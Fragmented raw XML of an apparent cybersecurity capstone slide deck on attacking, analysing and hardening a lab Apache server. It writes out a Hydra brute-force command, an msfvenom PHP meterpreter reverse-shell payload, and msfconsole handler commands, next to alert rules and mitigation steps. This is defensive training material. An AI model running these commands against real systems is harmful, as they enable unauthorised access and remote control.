          <ac:chgData name="Eric Loi" userId="a0ea965d253b5b23" providerId="LiveId" clId="{B64802EE-C2B8-4550-B2D2-59C703AAA260}" dt="2021-04-12T03:56:02.217" v="1625" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4001348691" sldId="297"/>
            <ac:picMk id="14" creationId="{E77B2A9B-7B91-4E5A-A293-194F37326BF0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Eric Loi" userId="a0ea965d253b5b23" providerId="LiveId" clId="{B64802EE-C2B8-4550-B2D2-59C703AAA260}" dt="2021-04-12T03:56:44.139" v="1641" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4001348691" sldId="297"/>
            <ac:picMk id="15" creationId="{9B110D29-E0AD-46E2-9332-7EA86E4D33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39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917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592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708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012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858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07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386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230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806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548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21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24050" y="910275"/>
            <a:ext cx="1846350" cy="37850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05/company_folder/secret_fold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Eric Loi</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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April 11, 2021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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Vulnerability]</a:t>
            </a:r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File Explorer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ith cracked creditials, payload file can be loaded at webdav folder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CE0E3-7DD2-46DB-A5F2-1AC66228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175" y="2160926"/>
            <a:ext cx="2277624" cy="15054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8EAFE4-3BFC-4428-B627-16F55BF16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472553" y="1660236"/>
            <a:ext cx="2277624" cy="3845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[Metasploit Vulnerability]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Metasploit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msfconsole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Using msfvenom to generate a payload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Using msfconsole to listening to the payload, and established a shell to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 the target machine.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D374B5-EBB0-4450-9A14-8B936A25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949" y="1618731"/>
            <a:ext cx="2171027" cy="1381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D3DC6C-8F57-450F-8F49-CE56E666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949" y="3107475"/>
            <a:ext cx="2179714" cy="12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6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12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Request for the Hidden Directory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2" name="Google Shape;1172;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142783" y="1584560"/>
            <a:ext cx="8847701" cy="3254418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681234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April 6, 2021 @02:30:00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AU" sz="1200" dirty="0"/>
              <a:t>16233 Packets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AU" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folder/secret_folder</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU"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7134CB-BC6F-462A-9E5D-AC83B191590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1837" y="2116465"/>
            <a:ext cx="4019475" cy="2246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5C670-279D-43A6-BC05-12FADB395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366" y="2116465"/>
            <a:ext cx="4531950" cy="22589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2" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="1413933"/>
            <a:ext cx="8406112" cy="3502717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AU" sz="1200" dirty="0"/>
              <a:t>16229 packets were made in this attack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CBD238-3BBA-4716-B80B-393B7178C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51" y="1488714"/>
            <a:ext cx="4924319" cy="1024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327E3F-A6D9-4C22-8493-03977941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575" y="2389680"/>
            <a:ext cx="5040683" cy="1049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D7513F-C5C3-4ADF-85AD-4627886D0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215" y="3478868"/>
            <a:ext cx="5946121" cy="13679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799"/>
            <a:ext cx="8409300" cy="3351155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372 requests were made to this directory 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AU" sz="1200" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>hen shell.php was copied to the /webdav directory</a:t>
            </a:r>
            <a:endParaRPr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F8FB9-F21C-4EA1-B7B8-D3AA72EF54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58553" y="1558056"/>
            <a:ext cx="5647193" cy="31706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remote shell vulnerability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799"/>
            <a:ext cx="8409300" cy="3351155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24067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376 requests were made to this directory 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AU" sz="1200" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>hell.php file was requested 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F8FB9-F21C-4EA1-B7B8-D3AA72EF54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5811" y="1528927"/>
            <a:ext cx="4661852" cy="21155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BB0B73-0285-47A3-9AF7-D412413DF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412" y="2737399"/>
            <a:ext cx="5601464" cy="194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3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Blue Team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17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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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Eric Loi</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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412317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Set alart when user attempting to browse directory structure will trigger alert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/>
              <a:t>If user made 5 attempts to open directory on the apache server within 30 seconds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799" y="1401492"/>
            <a:ext cx="4821133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500" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0"/>
              <a:t>Remove company related informat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" i="1" dirty="0"/>
              <a:t>io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" i="1" dirty="0"/>
              <a:t>n on outward facing apache server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" sz="1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i="1" dirty="0"/>
              <a:t>Set up policy to prohibit storing sensitive data on the apache system.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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Login as system admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="500" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Command      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>rm –r /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>company_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="700" i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Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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0" y="1473081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Set alert when multiple login authentication failures within 20 seconds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i="1" dirty="0"/>
              <a:t>10 login failures within 20 seconds then activate alarm.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" i="1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80654" y="1473081"/>
            <a:ext cx="4545582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/>
              <a:t>Lock user account after 10 uses login failures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 i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" i="1" dirty="0"/>
              <a:t>Use stronger password policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1000" i="1" dirty="0"/>
              <a:t>For example: Using 10+ word password made up of upper/lower case, number and special characters and use sha512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600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Command:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t> nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>ect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/common-password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="500" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Add the following configuration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>password     [success=1 default=ignore]    pam_unix.so obscure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>sha512  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>minlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>=10</a:t>
            </a:r>
            <a:endParaRPr sz="6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Execute Summary</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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1516956"/>
            <a:ext cx="9144000" cy="177355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 Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The presentation is to identify the attacks carried out on the target machine, providing an analysis of the attacks based on the logs collected, and providing the administrative &amp; technical mitigation recommendations to harden the security on the system.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0"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Capstone Engagement - Assessment, Analysis, and Hardening of a Vulnerable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094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WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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i="1" dirty="0"/>
              <a:t>Set alert when a write access is performed to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" i="1" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" i="1" dirty="0"/>
              <a:t> directory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/>
              <a:t>When write is performed to the webdav directory then trigger the alarm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427818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i="1" dirty="0"/>
              <a:t>The apache server already set access for authorised users only, the key issues to ensure credentials are not compromised.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/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>Commands  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>nano /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>/apache2/apache2.config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Set Options Indexes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>  to Options -Indexes + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1"/>
              <a:t>FollowSymLinks</a:t>
            </a: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Reverse Shell Uploads</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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512399"/>
            <a:ext cx="4465244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i="1" dirty="0"/>
              <a:t>It is very challenging to detect Metasploit attacks, as attacks can be carried out in many ways:  Code injection, Log in keystrokes, open new port services,, XSS, and uploading malicious payloads, etc.  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 dirty="0"/>
              <a:t>Instead of running detection, prevention is a better approach.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52944" y="1512399"/>
            <a:ext cx="4781111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i="1" dirty="0"/>
              <a:t>Using OWASP Top 10 approach is better prevention.</a:t>
            </a:r>
            <a:endParaRPr sz="14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i="1" dirty="0"/>
              <a:t>Carry out OWASP Top 10 maintenance  activities base on schedules and monitoring alerts.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" i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400" b="1" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Conclusion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22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4230886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Conclusion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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="840509"/>
            <a:ext cx="8409300" cy="3894667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75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 i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>In conclusion, the key vulnerabilities of the target machine were a weak password policy, no login failure limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> and the lacking of sensitive data management policies.   If these vulnerabilities were attended to, the attacks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>could have been avoided</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>.  As listed in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" i="1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2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Mitigation Strategies section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>OWASP Top 10 best practice will be a good prevention to minimise future attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="20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9684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24</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3396824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Code/Command used for : Finding the Hidden Directory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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40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Firefox brower was used, and was able to read the content of the sensitive file.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5F7BE-8D63-48F8-A9F7-34A97C91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87" y="870564"/>
            <a:ext cx="4985114" cy="40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86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Code/Command used for : Uncovering the Brute Force Attack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62;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF779A3-D938-4AB8-AB11-233E3B6A29EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40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Hydra was used to carried out the brute force attack.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996CC-DED0-499F-A48C-AC947D793684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1946566" y="804291"/>
            <a:ext cx="7017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Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>ashton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t> –P rockyou.txt –s 80 –f –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t> 192.168.1.105 http-get /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>company_folders</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>secret_folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t> 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473A3-16AC-4627-802D-D0DA3F75F0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73389" y="1691139"/>
            <a:ext cx="6020743" cy="1907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0D6D53-754E-4CC0-B140-8109A3BD70E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971669" y="1333563"/>
            <a:ext cx="4585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Screen output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>: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0352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Code/Command used for for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> vulnerability attack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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40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CrackStation was used to crack hash key.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File Manager was used to copy the payload for the metrosploit attack to the webdav direcotry.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B0465-2239-445B-842F-ABAB8CE070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25850" y="1084057"/>
            <a:ext cx="3627755" cy="1641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4E3E0-0550-43E5-AC7E-F61C4BAF3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007" y="2725175"/>
            <a:ext cx="3369731" cy="2227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0B3CB9-3177-465C-A8E1-77BED75AB0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189019" y="812800"/>
            <a:ext cx="4585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Screen outputs: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5779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Code/Command used for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit attack 1/2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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40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i="1" dirty="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sfvenom was used to create the payload file.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i="1" dirty="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sfconsole was used to setup a reverse shell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B3CB9-3177-465C-A8E1-77BED75AB0D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925781" y="750457"/>
            <a:ext cx="70034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Command:    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="700" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> –p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter_reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>LHOST=192.168.1.105 LPORT=80 –f raw &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> 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31A62-EEC0-4C1B-B215-419A0DD3D4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66863" y="1119584"/>
            <a:ext cx="3662391" cy="1042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0ACD31-2B7F-4181-AC24-2FAADF2FBB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174674" y="750457"/>
            <a:ext cx="1617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Screen output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>: 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B255B-FC1B-4B2F-A7DC-126C874E399E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="2417397"/>
            <a:ext cx="70034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Commands:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="400" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>set LHOST 192.168.1.90</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>set LPORT 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>set payload php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>reverse_tpc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>shell  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t> 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E0E25-1503-4A7A-BFB6-2FDAD23113D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5174674" y="2388720"/>
            <a:ext cx="2521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Screen output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r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7B2A9B-7B91-4E5A-A293-194F37326B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66863" y="2747392"/>
            <a:ext cx="3565205" cy="191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84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Code/Command used for: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit attack 2/2</a:t>
            </a:r>
            <a:endParaRPr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162;p65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8BF8C5D-D9F2-4DEB-AFBE-E8A3602CFBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311932" y="812800"/>
            <a:ext cx="1558432" cy="3973946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
              <a:alpha val="1453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i="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Firefox was used to execute the payload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Commmands use in the Shell Session @ meterpreter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ACD31-2B7F-4181-AC24-2FAADF2FBB86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="738162"/>
            <a:ext cx="1617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Screen output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>: 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E0E25-1503-4A7A-BFB6-2FDAD23113D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1988127" y="2199021"/>
            <a:ext cx="2521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Screen output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0"/>
              <a:t>: </a:t>
            </a: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AF6A7-C11C-4170-A83E-F1D6F72A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41" y="1013485"/>
            <a:ext cx="3803558" cy="1111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10D29-E0AD-46E2-9332-7EA86E4D33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40042" y="2449887"/>
            <a:ext cx="4430092" cy="233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4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55194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This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr dirty="0"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23583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11559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115587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1896229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2685937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501203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094817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189864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2685937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49642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191490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2729924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510282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" name="Google Shape;1037;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E0B27F-E294-466B-9546-5DC3FBE4214A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="471054" y="4283984"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
